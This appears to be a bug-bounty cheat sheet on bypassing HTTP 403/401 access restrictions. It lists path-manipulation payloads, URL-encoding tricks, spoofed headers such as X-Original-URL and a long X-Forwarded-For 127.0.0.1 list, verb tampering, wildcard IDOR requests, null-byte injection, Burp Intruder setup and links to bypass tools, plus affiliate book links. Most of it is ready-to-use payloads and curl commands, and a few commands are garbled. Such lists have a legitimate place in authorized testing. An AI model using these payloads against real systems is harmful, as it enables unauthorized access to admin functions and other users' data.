Bypass 403 / 401

Various bypass tricks and tools

/admin -> 403 or 302

/Admin
/AdMin
/admin/
/admin/. 
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin

X-Originial-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

curl -i https:%2F%http://2Ftarget.com/admin -H "X-Original-URL: /admin"

curl -i https3A%2F%http://2Ftarget.com/admin -X POST -H "X-Custom-IP-Authorization: 127.0.0.1"

Capitalize the path

Request to /ADMIN/DELETEUSER may still be mapped to the /admin/deleteUser

curl https://example.com/AdMiN

Add Suffix

curl https://example.com/admin.json

PUT /my_day/jobs/4 HTTP/2 = 403
PUT /my_day/jobs/4.json HTTP/2 = 200 OK

URL encoding

# Try %2e%2e%2f (../) or %20 (space)
curl -g --path-as-is "https://example.com/%2e%2e/admin"

Spring framework

If Spring framework have enabled the useSuffixPatternMatch option, a request to /admin/deleteUser.anything would still match the /admin/deleteUser pattern.

Prior to Spring 5.3, this option is enabled by default.

API - IDOR

IDOR

/api/67898555007/users -> 403

/api//users
/api\\users

/api/v1/user/id -> 403

/api/vl/user/id.json
/api/vl/user/id?
/api/vl/user/id/
/api/v2/user/id
/api/vl/user/id&accountdetail
/api/v1/user/yourid&victimid

X-Original-Url: /api/v1/user/id

Send a wildcard (*, %, ., _) instead of an ID, some backend might respond with the data of all the users.

GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1

Git

If a path with .git/ = 403, then /.git/config might be 200!

Wordpress

X-Rewrite-Url Header can be used to bypass WordPress 403 pages.

POST /xmlrpc HTTP/1.1       
Host: https://blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php

Burp Extensions - 403 Bypasser

HTTP Verb Tampering

HTTP Verb Tampering

Change request method from GET to TRACE, etc.

curl -X TRACE https://example.com/admin --path-as-is

GET /admin HTTP/1.1
Host: target.com

Change method like this way:

POST /admin HTTP/1.1
Host: target.com

If the application supports method override header then you can also test like this way:

POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET

Or

X-http-override: GET

Fuzz

· /FUZZ/admin

· /admin/FUZZ

· /adminFUZZ

Payload List

https://raw.githubusercontent.com/sabir789/BugBountyTips/refs/heads/Master/Payloadsraw.githubusercontent.com

1. Set Up Burp Suite Intruder:

   • Open Burp Suite and navigate to the Intruder tab.

   • Send your request to Intruder by right-clicking on it in the Proxy tab and selecting Send to Intruder.

   • Configure the Intruder positions by selecting the directory or path you want to bypass.

2. Load the Payloads:

   • Copy the payloads from the provided wordlist.

   • Paste the payloads into the Payload Options input field in the Intruder tab.

3. Payload Processing:

   • Below the Payload Options section, locate the Payload Processing tool.

   • Click the Add button to open a new window.

   • Select the rule Replace String.

   • Replace the placeholder {base} with the base value you want to use for bypassing.

4. Disable URL Encoding:

   • Uncheck the option URL-encode these characters to ensure the payloads are not altered.

5. Start the Attack:

   • Click Start Attack and observe the results.

   • Look for requests that return a 200 status code, indicating a successful bypass.

Content-Length:0

curl -X POST -H “Content-Length:0” https://www.redacted.com

Sensitive Data Exposure via 403 Forbidden BypassMedium

403 Header Bypass

curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/admin
curl -H "Referer: https://example.com" https://example.com/restricted
curl -H "X-Original-URL: /admin" https://example.com/404
curl -H "X-Rewrite-URL: /admin" https://example.com/404

Bug-Bounty-Wordlists/403_header_payloads.txt at main · Karanxa/Bug-Bounty-WordlistsGitHub

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

OR

GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1

Parameter Tampering

curl "https://example.com/admin?unused_param=1"
curl "https://example.com/admin?redirect=allowed"

Secret Trick: Override parameters with conflicting values:

curl "https://example.com/admin?admin=false&admin=true"

Null Byte Injection

curl --path-as-is "https://example.com/admin.php%00.html"

HTTP Version Downgrade

curl --http1.0 https://example.com/admin

Bypass Origin

GitHub - assetnote/newtowner: Abuse trust-boundaries to bypass firewalls and network controlsGitHub

Tools

Go-recon - gr-403:

GitHub - D3Ext/go-recon: External recon toolkitGitHub

GitHub - devploit/nomore403: 🚫 Advanced tool for security researchers to bypass 403/40X restrictions through smart techniques and adaptive request manipulation. Fast. Precise. Effective.GitHub

GitHub - trap-bytes/403jump: HTTP 403 bypass toolGitHub

GitHub - iamj0ker/bypass-403: A simple script just made for self use for bypassing 403GitHub

GitHub - yunemse48/403bypasserGitHub

GitHub - Dheerajmadhukar/4-ZERO-3: 403/401 Bypass Methods + Bash Automation + Your Support ;)GitHub

# byp4xx $TARGET

Resources

$100-$200 worth 403 Bypass TechniquesMedium

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.